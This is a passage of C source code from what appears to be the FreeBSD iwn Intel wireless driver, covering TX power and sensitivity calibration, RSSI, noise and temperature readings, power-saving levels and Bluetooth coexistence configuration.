chans[1].samples[c][1].power, 1); gain = interpolate(chan, chans[0].num, chans[0].samples[c][1].gain, chans[1].num, chans[1].samples[c][1].gain, 1); temp = interpolate(chan, chans[0].num, chans[0].samples[c][1].temp, chans[1].num, chans[1].samples[c][1].temp, 1); DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: Tx chain %d: power=%d gain=%d temp=%d\n", __func__, c, power, gain, temp); /* Compute temperature compensation. */ tdiff = ((sc->temp - temp) * 2) / tdiv[grp]; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: temperature compensation=%d (current=%d, EEPROM=%d)\n", __func__, tdiff, sc->temp, temp); for (ridx = 0; ridx <= IWN_RIDX_MAX; ridx++) { /* Convert dBm to half-dBm. */ maxchpwr = sc->maxpwr[chan] * 2; if ((ridx / 8) & 1) maxchpwr -= 6; /* MIMO 2T: -3dB */ pwr = maxpwr; /* Adjust TX power based on rate. */ if ((ridx % 8) == 5) pwr -= 15; /* OFDM48: -7.5dB */ else if ((ridx % 8) == 6) pwr -= 17; /* OFDM54: -8.5dB */ else if ((ridx % 8) == 7) pwr -= 20; /* OFDM60: -10dB */ else pwr -= 10; /* Others: -5dB */ /* Do not exceed channel max TX power. */ if (pwr > maxchpwr) pwr = maxchpwr; idx = gain - (pwr - power) - tdiff - vdiff; if ((ridx / 8) & 1) /* MIMO */ idx += (int32_t)le32toh(uc->atten[grp][c]); if (cmd.band == 0) idx += 9; /* 5GHz */ if (ridx == IWN_RIDX_MAX) idx += 5; /* CCK */ /* Make sure idx stays in a valid range. */ if (idx < 0) idx = 0; else if (idx > IWN4965_MAX_PWR_INDEX) idx = IWN4965_MAX_PWR_INDEX; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: Tx chain %d, rate idx %d: power=%d\n", __func__, c, ridx, idx); cmd.power[ridx].rf_gain[c] = rf_gain[idx]; cmd.power[ridx].dsp_gain[c] = dsp_gain[idx]; } } DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: set tx power for chan %d\n", __func__, chan); return iwn_cmd(sc, IWN_CMD_TXPOWER, &cmd, sizeof cmd, async); #undef interpolate #undef fdivround } static int iwn5000_set_txpower(struct iwn_softc *sc, struct ieee80211_channel *ch, int async) { struct iwn5000_cmd_txpower cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * TX power calibration is handled automatically by the firmware * for 5000 Series. */ memset(&cmd, 0, sizeof cmd); cmd.global_limit = 2 * IWN5000_TXPOWER_MAX_DBM; /* 16 dBm */ cmd.flags = IWN5000_TXPOWER_NO_CLOSED; cmd.srv_limit = IWN5000_TXPOWER_AUTO; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting TX power\n", __func__); return iwn_cmd(sc, IWN_CMD_TXPOWER_DBM, &cmd, sizeof cmd, async); } /* * Retrieve the maximum RSSI (in dBm) among receivers. */ static int iwn4965_get_rssi(struct iwn_softc *sc, struct iwn_rx_stat *stat) { struct iwn4965_rx_phystat *phy = (void *)stat->phybuf; uint8_t mask, agc; int rssi; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); mask = (le16toh(phy->antenna) >> 4) & IWN_ANT_ABC; agc = (le16toh(phy->agc) >> 7) & 0x7f; rssi = 0; if (mask & IWN_ANT_A) rssi = MAX(rssi, phy->rssi[0]); if (mask & IWN_ANT_B) rssi = MAX(rssi, phy->rssi[2]); if (mask & IWN_ANT_C) rssi = MAX(rssi, phy->rssi[4]); DPRINTF(sc, IWN_DEBUG_RECV, "%s: agc %d mask 0x%x rssi %d %d %d result %d\n", __func__, agc, mask, phy->rssi[0], phy->rssi[2], phy->rssi[4], rssi - agc - IWN_RSSI_TO_DBM); return rssi - agc - IWN_RSSI_TO_DBM; } static int iwn5000_get_rssi(struct iwn_softc *sc, struct iwn_rx_stat *stat) { struct iwn5000_rx_phystat *phy = (void *)stat->phybuf; uint8_t agc; int rssi; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); agc = (le32toh(phy->agc) >> 9) & 0x7f; rssi = MAX(le16toh(phy->rssi[0]) & 0xff, le16toh(phy->rssi[1]) & 0xff); rssi = MAX(le16toh(phy->rssi[2]) & 0xff, rssi); DPRINTF(sc, IWN_DEBUG_RECV, "%s: agc %d rssi %d %d %d result %d\n", __func__, agc, phy->rssi[0], phy->rssi[1], phy->rssi[2], rssi - agc - IWN_RSSI_TO_DBM); return rssi - agc - IWN_RSSI_TO_DBM; } /* * Retrieve the average noise (in dBm) among receivers. */ static int iwn_get_noise(const struct iwn_rx_general_stats *stats) { int i, total, nbant, noise; total = nbant = 0; for (i = 0; i < 3; i++) { if ((noise = le32toh(stats->noise[i]) & 0xff) == 0) continue; total += noise; nbant++; } /* There should be at least one antenna but check anyway. */ return (nbant == 0) ? -127 : (total / nbant) - 107; } /* * Compute temperature (in degC) from last received statistics. */ static int iwn4965_get_temperature(struct iwn_softc *sc) { struct iwn_ucode_info *uc = &sc->ucode_info; int32_t r1, r2, r3, r4, temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); r1 = le32toh(uc->temp[0].chan20MHz); r2 = le32toh(uc->temp[1].chan20MHz); r3 = le32toh(uc->temp[2].chan20MHz); r4 = le32toh(sc->rawtemp); if (r1 == r3) /* Prevents division by 0 (should not happen). */ return 0; /* Sign-extend 23-bit R4 value to 32-bit. */ r4 = ((r4 & 0xffffff) ^ 0x800000) - 0x800000; /* Compute temperature in Kelvin. */ temp = (259 * (r4 - r2)) / (r3 - r1); temp = (temp * 97) / 100 + 8; DPRINTF(sc, IWN_DEBUG_ANY, "temperature %dK/%dC\n", temp, IWN_KTOC(temp)); return IWN_KTOC(temp); } static int iwn5000_get_temperature(struct iwn_softc *sc) { int32_t temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * Temperature is not used by the driver for 5000 Series because * TX power calibration is handled by firmware. */ temp = le32toh(sc->rawtemp); if (sc->hw_type == IWN_HW_REV_TYPE_5150) { temp = (temp / -5) + sc->temp_off; temp = IWN_KTOC(temp); } return temp; } /* * Initialize sensitivity calibration state machine. */ static int iwn_init_sensitivity(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct iwn_calib_state *calib = &sc->calib; uint32_t flags; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Reset calibration state machine. */ memset(calib, 0, sizeof (*calib)); calib->state = IWN_CALIB_STATE_INIT; calib->cck_state = IWN_CCK_STATE_HIFA; /* Set initial correlation values. */ calib->ofdm_x1 = sc->limits->min_ofdm_x1; calib->ofdm_mrc_x1 = sc->limits->min_ofdm_mrc_x1; calib->ofdm_x4 = sc->limits->min_ofdm_x4; calib->ofdm_mrc_x4 = sc->limits->min_ofdm_mrc_x4; calib->cck_x4 = 125; calib->cck_mrc_x4 = sc->limits->min_cck_mrc_x4; calib->energy_cck = sc->limits->energy_cck; /* Write initial sensitivity. */ if ((error = iwn_send_sensitivity(sc)) != 0) return error; /* Write initial gains. */ if ((error = ops->init_gains(sc)) != 0) return error; /* Request statistics at each beacon interval. */ flags = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: sending request for statistics\n", __func__); return iwn_cmd(sc, IWN_CMD_GET_STATISTICS, &flags, sizeof flags, 1); } /* * Collect noise and RSSI statistics for the first 20 beacons received * after association and use them to determine connected antennas and * to set differential gains. */ static void iwn_collect_noise(struct iwn_softc *sc, const struct iwn_rx_general_stats *stats) { struct iwn_ops *ops = &sc->ops; struct iwn_calib_state *calib = &sc->calib; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Accumulate RSSI and noise for all 3 antennas. */ for (i = 0; i < 3; i++) { calib->rssi[i] += le32toh(stats->rssi[i]) & 0xff; calib->noise[i] += le32toh(stats->noise[i]) & 0xff; } /* NB: We update differential gains only once after 20 beacons. */ if (++calib->nbeacons < 20) return; /* Determine highest average RSSI. */ val = MAX(calib->rssi[0], calib->rssi[1]); val = MAX(calib->rssi[2], val); /* Determine which antennas are connected. */ sc->chainmask = sc->rxchainmask; for (i = 0; i < 3; i++) if (val - calib->rssi[i] > 15 * 20) sc->chainmask &= ~(1 << i); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: RX chains mask: theoretical=0x%x, actual=0x%x\n", __func__, sc->rxchainmask, sc->chainmask); /* If none of the TX antennas are connected, keep at least one. */ if ((sc->chainmask & sc->txchainmask) == 0) sc->chainmask |= IWN_LSB(sc->txchainmask); (void)ops->set_gains(sc); calib->state = IWN_CALIB_STATE_RUN; #ifdef notyet /* XXX Disable RX chains with no antennas connected. */ sc->rxon->rxchain = htole16(IWN_RXCHAIN_SEL(sc->chainmask)); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); (void)iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); #endif /* Enable power-saving mode if requested by user. */ if (ic->ic_flags & IEEE80211_F_PMGTON) (void)iwn_set_pslevel(sc, 0, 3, 1); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } static int iwn4965_init_gains(struct iwn_softc *sc) { struct iwn_phy_calib_gain cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.code = IWN4965_PHY_CALIB_DIFF_GAIN; /* Differential gains initially set to 0 for all 3 antennas. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting initial differential gains\n", __func__); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn5000_init_gains(struct iwn_softc *sc) { struct iwn_phy_calib cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.code = sc->reset_noise_gain; cmd.ngroups = 1; cmd.isvalid = 1; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting initial differential gains\n", __func__); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn4965_set_gains(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_phy_calib_gain cmd; int i, delta, noise; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Get minimal noise among connected antennas. */ noise = INT_MAX; /* NB: There's at least one antenna. */ for (i = 0; i < 3; i++) if (sc->chainmask & (1 << i)) noise = MIN(calib->noise[i], noise); memset(&cmd, 0, sizeof cmd); cmd.code = IWN4965_PHY_CALIB_DIFF_GAIN; /* Set differential gains for connected antennas. */ for (i = 0; i < 3; i++) { if (sc->chainmask & (1 << i)) { /* Compute attenuation (in unit of 1.5dB). */ delta = (noise - (int32_t)calib->noise[i]) / 30; /* NB: delta <= 0 */ /* Limit to [-4.5dB,0]. */ cmd.gain[i] = MIN(abs(delta), 3); if (delta < 0) cmd.gain[i] |= 1 << 2; /* sign bit */ } } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting differential gains Ant A/B/C: %x/%x/%x (%x)\n", cmd.gain[0], cmd.gain[1], cmd.gain[2], sc->chainmask); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn5000_set_gains(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_phy_calib_gain cmd; int i, ant, div, delta; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* We collected 20 beacons and !=6050 need a 1.5 factor. */ div = (sc->hw_type == IWN_HW_REV_TYPE_6050) ? 20 : 30; memset(&cmd, 0, sizeof cmd); cmd.code = sc->noise_gain; cmd.ngroups = 1; cmd.isvalid = 1; /* Get first available RX antenna as referential. */ ant = IWN_LSB(sc->rxchainmask); /* Set differential gains for other antennas. */ for (i = ant + 1; i < 3; i++) { if (sc->chainmask & (1 << i)) { /* The delta is relative to antenna "ant". */ delta = ((int32_t)calib->noise[ant] - (int32_t)calib->noise[i]) / div; /* Limit to [-4.5dB,+4.5dB]. */ cmd.gain[i - 1] = MIN(abs(delta), 3); if (delta < 0) cmd.gain[i - 1] |= 1 << 2; /* sign bit */ } } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting differential gains Ant B/C: %x/%x (%x)\n", cmd.gain[0], cmd.gain[1], sc->chainmask); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } /* * Tune RF RX sensitivity based on the number of false alarms detected * during the last beacon period. */ static void iwn_tune_sensitivity(struct iwn_softc *sc, const struct iwn_rx_stats *stats) { #define inc(val, inc, max) \ if ((val) < (max)) { \ if ((val) < (max) - (inc)) \ (val) += (inc); \ else \ (val) = (max); \ needs_update = 1; \ } #define dec(val, dec, min) \ if ((val) > (min)) { \ if ((val) > (min) + (dec)) \ (val) -= (dec); \ else \ (val) = (min); \ needs_update = 1; \ } const struct iwn_sensitivity_limits *limits = sc->limits; struct iwn_calib_state *calib = &sc->calib; uint32_t val, rxena, fa; uint32_t energy[3], energy_min; uint8_t noise[3], noise_ref; int i, needs_update = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Check that we've been enabled long enough. */ if ((rxena = le32toh(stats->general.load)) == 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end not so long\n", __func__); return; } /* Compute number of false alarms since last call for OFDM. */ fa = le32toh(stats->ofdm.bad_plcp) - calib->bad_plcp_ofdm; fa += le32toh(stats->ofdm.fa) - calib->fa_ofdm; fa *= 200 * IEEE80211_DUR_TU; /* 200TU */ if (fa > 50 * rxena) { /* High false alarm count, decrease sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: OFDM high false alarm count: %u\n", __func__, fa); inc(calib->ofdm_x1, 1, limits->max_ofdm_x1); inc(calib->ofdm_mrc_x1, 1, limits->max_ofdm_mrc_x1); inc(calib->ofdm_x4, 1, limits->max_ofdm_x4); inc(calib->ofdm_mrc_x4, 1, limits->max_ofdm_mrc_x4); } else if (fa < 5 * rxena) { /* Low false alarm count, increase sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: OFDM low false alarm count: %u\n", __func__, fa); dec(calib->ofdm_x1, 1, limits->min_ofdm_x1); dec(calib->ofdm_mrc_x1, 1, limits->min_ofdm_mrc_x1); dec(calib->ofdm_x4, 1, limits->min_ofdm_x4); dec(calib->ofdm_mrc_x4, 1, limits->min_ofdm_mrc_x4); } /* Compute maximum noise among 3 receivers. */ for (i = 0; i < 3; i++) noise[i] = (le32toh(stats->general.noise[i]) >> 8) & 0xff; val = MAX(noise[0], noise[1]); val = MAX(noise[2], val); /* Insert it into our samples table. */ calib->noise_samples[calib->cur_noise_sample] = val; calib->cur_noise_sample = (calib->cur_noise_sample + 1) % 20; /* Compute maximum noise among last 20 samples. */ noise_ref = calib->noise_samples[0]; for (i = 1; i < 20; i++) noise_ref = MAX(noise_ref, calib->noise_samples[i]); /* Compute maximum energy among 3 receivers. */ for (i = 0; i < 3; i++) energy[i] = le32toh(stats->general.energy[i]); val = MIN(energy[0], energy[1]); val = MIN(energy[2], val); /* Insert it into our samples table. */ calib->energy_samples[calib->cur_energy_sample] = val; calib->cur_energy_sample = (calib->cur_energy_sample + 1) % 10; /* Compute minimum energy among last 10 samples. */ energy_min = calib->energy_samples[0]; for (i = 1; i < 10; i++) energy_min = MAX(energy_min, calib->energy_samples[i]); energy_min += 6; /* Compute number of false alarms since last call for CCK. */ fa = le32toh(stats->cck.bad_plcp) - calib->bad_plcp_cck; fa += le32toh(stats->cck.fa) - calib->fa_cck; fa *= 200 * IEEE80211_DUR_TU; /* 200TU */ if (fa > 50 * rxena) { /* High false alarm count, decrease sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK high false alarm count: %u\n", __func__, fa); calib->cck_state = IWN_CCK_STATE_HIFA; calib->low_fa = 0; if (calib->cck_x4 > 160) { calib->noise_ref = noise_ref; if (calib->energy_cck > 2) dec(calib->energy_cck, 2, energy_min); } if (calib->cck_x4 < 160) { calib->cck_x4 = 161; needs_update = 1; } else inc(calib->cck_x4, 3, limits->max_cck_x4); inc(calib->cck_mrc_x4, 3, limits->max_cck_mrc_x4); } else if (fa < 5 * rxena) { /* Low false alarm count, increase sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK low false alarm count: %u\n", __func__, fa); calib->cck_state = IWN_CCK_STATE_LOFA; calib->low_fa++; if (calib->cck_state != IWN_CCK_STATE_INIT && (((int32_t)calib->noise_ref - (int32_t)noise_ref) > 2 || calib->low_fa > 100)) { inc(calib->energy_cck, 2, limits->min_energy_cck); dec(calib->cck_x4, 3, limits->min_cck_x4); dec(calib->cck_mrc_x4, 3, limits->min_cck_mrc_x4); } } else { /* Not worth to increase or decrease sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK normal false alarm count: %u\n", __func__, fa); calib->low_fa = 0; calib->noise_ref = noise_ref; if (calib->cck_state == IWN_CCK_STATE_HIFA) { /* Previous interval had many false alarms. */ dec(calib->energy_cck, 8, energy_min); } calib->cck_state = IWN_CCK_STATE_INIT; } if (needs_update) (void)iwn_send_sensitivity(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); #undef dec #undef inc } static int iwn_send_sensitivity(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_enhanced_sensitivity_cmd cmd; int len; memset(&cmd, 0, sizeof cmd); len = sizeof (struct iwn_sensitivity_cmd); cmd.which = IWN_SENSITIVITY_WORKTBL; /* OFDM modulation. */ cmd.corr_ofdm_x1 = htole16(calib->ofdm_x1); cmd.corr_ofdm_mrc_x1 = htole16(calib->ofdm_mrc_x1); cmd.corr_ofdm_x4 = htole16(calib->ofdm_x4); cmd.corr_ofdm_mrc_x4 = htole16(calib->ofdm_mrc_x4); cmd.energy_ofdm = htole16(sc->limits->energy_ofdm); cmd.energy_ofdm_th = htole16(62); /* CCK modulation. */ cmd.corr_cck_x4 = htole16(calib->cck_x4); cmd.corr_cck_mrc_x4 = htole16(calib->cck_mrc_x4); cmd.energy_cck = htole16(calib->energy_cck); /* Barker modulation: use default values. */ cmd.corr_barker = htole16(190); cmd.corr_barker_mrc = htole16(sc->limits->barker_mrc); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: set sensitivity %d/%d/%d/%d/%d/%d/%d\n", __func__, calib->ofdm_x1, calib->ofdm_mrc_x1, calib->ofdm_x4, calib->ofdm_mrc_x4, calib->cck_x4, calib->cck_mrc_x4, calib->energy_cck); if (!(sc->sc_flags & IWN_FLAG_ENH_SENS)) goto send; /* Enhanced sensitivity settings. */ len = sizeof (struct iwn_enhanced_sensitivity_cmd); cmd.ofdm_det_slope_mrc = htole16(668); cmd.ofdm_det_icept_mrc = htole16(4); cmd.ofdm_det_slope = htole16(486); cmd.ofdm_det_icept = htole16(37); cmd.cck_det_slope_mrc = htole16(853); cmd.cck_det_icept_mrc = htole16(4); cmd.cck_det_slope = htole16(476); cmd.cck_det_icept = htole16(99); send: return iwn_cmd(sc, IWN_CMD_SET_SENSITIVITY, &cmd, len, 1); } /* * Look at the increase of PLCP errors over time; if it exceeds * a programmed threshold then trigger an RF retune. */ static void iwn_check_rx_recovery(struct iwn_softc *sc, struct iwn_stats *rs) { int32_t delta_ofdm, delta_ht, delta_cck; struct iwn_calib_state *calib = &sc->calib; int delta_ticks, cur_ticks; int delta_msec; int thresh; /* * Calculate the difference between the current and * previous statistics. */ delta_cck = le32toh(rs->rx.cck.bad_plcp) - calib->bad_plcp_cck; delta_ofdm = le32toh(rs->rx.ofdm.bad_plcp) - calib->bad_plcp_ofdm; delta_ht = le32toh(rs->rx.ht.bad_plcp) - calib->bad_plcp_ht; /* * Calculate the delta in time between successive statistics * messages. Yes, it can roll over; so we make sure that * this doesn't happen. * * XXX go figure out what to do about rollover * XXX go figure out what to do if ticks rolls over to -ve instead! * XXX go stab signed integer overflow undefined-ness in the face. */ cur_ticks = ticks; delta_ticks = cur_ticks - sc->last_calib_ticks; /* * If any are negative, then the firmware likely reset; so just * bail. We'll pick this up next time. */ if (delta_cck < 0 || delta_ofdm < 0 || delta_ht < 0 || delta_ticks < 0) return; /* * delta_ticks is in ticks; we need to convert it up to milliseconds * so we can do some useful math with it. */ delta_msec = ticks_to_msecs(delta_ticks); /* * Calculate what our threshold is given the current delta_msec. */ thresh = sc->base_params->plcp_err_threshold * delta_msec; DPRINTF(sc, IWN_DEBUG_STATE, "%s: time delta: %d; cck=%d, ofdm=%d, ht=%d, total=%d, thresh=%d\n", __func__, delta_msec, delta_cck, delta_ofdm, delta_ht, (delta_msec + delta_cck + delta_ofdm + delta_ht), thresh); /* * If we need a retune, then schedule a single channel scan * to a channel that isn't the currently active one! * * The math from linux iwlwifi: * * if ((delta * 100 / msecs) > threshold) */ if (thresh > 0 && (delta_cck + delta_ofdm + delta_ht) * 100 > thresh) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: PLCP error threshold raw (%d) comparison (%d) " "over limit (%d); retune!\n", __func__, (delta_cck + delta_ofdm + delta_ht), (delta_cck + delta_ofdm + delta_ht) * 100, thresh); } } /* * Set STA mode power saving level (between 0 and 5). * Level 0 is CAM (Continuously Aware Mode), 5 is for maximum power saving. */ static int iwn_set_pslevel(struct iwn_softc *sc, int dtim, int level, int async) { struct iwn_pmgt_cmd cmd; const struct iwn_pmgt *pmgt; uint32_t max, skip_dtim; uint32_t reg; int i; DPRINTF(sc, IWN_DEBUG_PWRSAVE, "%s: dtim=%d, level=%d, async=%d\n", __func__, dtim, level, async); /* Select which PS parameters to use. */ if (dtim <= 2) pmgt = &iwn_pmgt[0][level]; else if (dtim <= 10) pmgt = &iwn_pmgt[1][level]; else pmgt = &iwn_pmgt[2][level]; memset(&cmd, 0, sizeof cmd); if (level != 0) /* not CAM */ cmd.flags |= htole16(IWN_PS_ALLOW_SLEEP); if (level == 5) cmd.flags |= htole16(IWN_PS_FAST_PD); /* Retrieve PCIe Active State Power Management (ASPM). */ reg = pci_read_config(sc->sc_dev, sc->sc_cap_off + 0x10, 1); if (!(reg & 0x1)) /* L0s Entry disabled. */ cmd.flags |= htole16(IWN_PS_PCI_PMGT); cmd.rxtimeout = htole32(pmgt->rxtimeout * 1024); cmd.txtimeout = htole32(pmgt->txtimeout * 1024); if (dtim == 0) { dtim = 1; skip_dtim = 0; } else skip_dtim = pmgt->skip_dtim; if (skip_dtim != 0) { cmd.flags |= htole16(IWN_PS_SLEEP_OVER_DTIM); max = pmgt->intval[4]; if (max == (uint32_t)-1) max = dtim * (skip_dtim + 1); else if (max > dtim) max = (max / dtim) * dtim; } else max = dtim; for (i = 0; i < 5; i++) cmd.intval[i] = htole32(MIN(max, pmgt->intval[i])); DPRINTF(sc, IWN_DEBUG_RESET, "setting power saving level to %d\n", level); return iwn_cmd(sc, IWN_CMD_SET_POWER_MODE, &cmd, sizeof cmd, async); } static int iwn_send_btcoex(struct iwn_softc *sc) { struct iwn_bluetooth cmd; memset(&cmd, 0, sizeof cmd); cmd.flags = IWN_BT_COEX_CHAN_ANN | IWN_BT_COEX_BT_PRIO; cmd.lead_time = IWN_BT_LEAD_TIME_DEF; cmd.max_kill = IWN_BT_MAX_KILL_DEF; DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring bluetooth coexistence\n", __func__); return iwn_cmd(sc, IWN_CMD_BT_COEX, &cmd, sizeof(cmd), 0); } static int iwn_send_advanced_btcoex(struct iwn_softc *sc) { static const uint32_t btcoex_3wire[12] = { 0xaaaaaaaa, 0xaaaaaaaa, 0xaeaaaaaa, 0xaaaaaaaa, 0xcc00ff28, 0x0000aaaa, 0xcc00aaaa, 0x0000aaaa, 0xc0004000, 0x00004000, 0xf0005000, 0xf0005000, }; struct iwn6000_btcoex_config btconfig; struct iwn2000_btcoex_config btconfig2k; struct iwn_btcoex_priotable btprio; struct iwn_btcoex_prot btprot; int error, i; uint8_t flags; memset(&btconfig, 0, sizeof btconfig); memset(&btconfig2k, 0, sizeof btconfig2k); flags = IWN_BT_FLAG_COEX6000_MODE_3W << IWN_BT_FLAG_COEX6000_MODE_SHIFT; // Done as is in linux kernel 3.2 if (sc->base_params->bt_sco_disable) flags &= ~IWN_BT_FLAG_SYNC_2_BT_DISABLE; else flags |= IWN_BT_FLAG_SYNC_2_BT_DISABLE; flags |= IWN_BT_FLAG_COEX6000_CHAN_INHIBITION; /* Default flags result is 145 as old value */ /* * Flags value has to be review. Values must change if we * which to disable it */ if (sc->base_params->bt_session_2) { btconfig2k.flags = flags; btconfig2k.max_kill = 5; btconfig2k.bt3_t7_timer = 1; btconfig2k.kill_ack = htole32(0xffff0000); btconfig2k.kill_cts = htole32(0xffff0000); btconfig2k.sample_time = 2; btconfig2k.bt3_t2_timer = 0xc; for (i = 0; i < 12; i++) btconfig2k.lookup_table[i] = htole32(btcoex_3wire[i]); btconfig2k.valid = htole16(0xff); btconfig2k.prio_boost = htole32(0xf0); DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring advanced bluetooth coexistence" " session 2, flags : 0x%x\n", __func__, flags); error = iwn_cmd(sc, IWN_CMD_BT_COEX, &btconfig2k, sizeof(btconfig2k), 1); } else { btconfig.flags = flags; btconfig.max_kill = 5; btconfig.bt3_t7_timer = 1; btconfig.kill_ack = htole32(0xffff0000); btconfig.kill_cts = htole32(0xffff0000); btconfig.sample_time = 2; btconfig.bt3_t2_timer = 0xc; for (i = 0; i < 12; i++) btconfig.lookup_table[i] = htole32(btcoex_3wire[i]); btconfig.valid = htole16(0xff); btconfig.prio_boost = 0xf0; DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring advanced bluetooth coexistence," " flags : 0x%x\n", __func__, flags); error = iwn_cmd(sc, IWN_CMD_BT_COEX, &btconfig, sizeof(btconfig), 1); } if (error != 0) return error; memset(&btprio, 0, sizeof btprio); btprio.calib_init1 = 0x6; btprio.calib_init2 = 0x7; btprio.calib_periodic_low1 = 0x2; btprio.calib_periodic_low2 = 0x3; btprio.calib_periodic_high1 = 0x4; btprio.calib_periodic_high2 = 0x5; btprio.dtim = 0x6; btprio.scan52 = 0x8; btprio.scan24 = 0xa; error = iwn_cmd(sc, IWN_CMD_BT_COEX_PRIOTABLE, &btprio, sizeof(btprio), 1); if (error != 0) return error; /* Force BT state machine change. */ memset(&btprot, 0, sizeof btprot); btprot.open = 1; btprot.type = 1; error = iwn_cmd(sc, IWN_CMD_BT_COEX_PROT, &btprot, sizeof(btprot), 1); if (error != 0) return error; btprot.open = 0; return iwn_cmd(sc, IWN_CMD_BT_COEX_PROT, &btprot, sizeof(btprot), 1); } static int iwn5000_runtime_calib(struct iwn_softc *sc) { struct iwn5000_calib_config cmd; memset(&cmd, 0, sizeof cmd); cmd.ucode.once.enable = 0xffffffff; cmd.ucode.once.start = IWN5000_CALIB_DC; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: configuring runtime calibration\n", __func__); return iwn_cmd(sc, IWN5000_CMD_CALIB_CONFIG, &cmd, sizeof(cmd), 0); } static int iwn_config(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t txmask; uint16_t rxchain; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if ((sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET) && (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2)) { device_printf(sc->sc_dev,"%s: temp_offset and temp_offsetv2 are" " exclusive each together. Review NIC config file. Conf" " : 0x%08x Flags : 0x%08x \n", __func__, sc->base_params->calib_need, (IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET | IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2)); return (EINVAL); } /* Compute temperature calib if needed. Will be send by send calib */ if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET) { error = iwn5000_temp_offset_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not set temperature offset\n", __func__); return (error); } } else if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2) { error = iwn5000_temp_offset_calibv2(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not compute temperature offset v2\n", __func__); return (error); } } if (sc->hw_type == IWN_HW_REV_TYPE_6050) { /* Configure runtime DC calibration. */ error = iwn5000_runtime_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure runtime calibration\n", __func__); return error; } } /* Configure valid TX chains for >=5000 Series. */ if (sc->hw_type != IWN_HW_REV_TYPE_4965) { txmask = htole32(sc->txchainmask); DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring valid TX chains 0x%x\n", __func__, txmask); error = iwn_cmd(sc, IWN5000_CMD_TX_ANT_CONFIG, &txmask, sizeof txmask, 0); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure valid TX chains, " "error %d\n", __func__, error); return error; } } /* Configure bluetooth coexistence. */ error = 0; /* Configure bluetooth coexistence if needed. */ if (sc->base_params->bt_mode == IWN_BT_ADVANCED) error = iwn_send_advanced_btcoex(sc); if (sc->base_params->bt_mode == IWN_BT_SIMPLE) error = iwn_send_btcoex(sc); if (error != 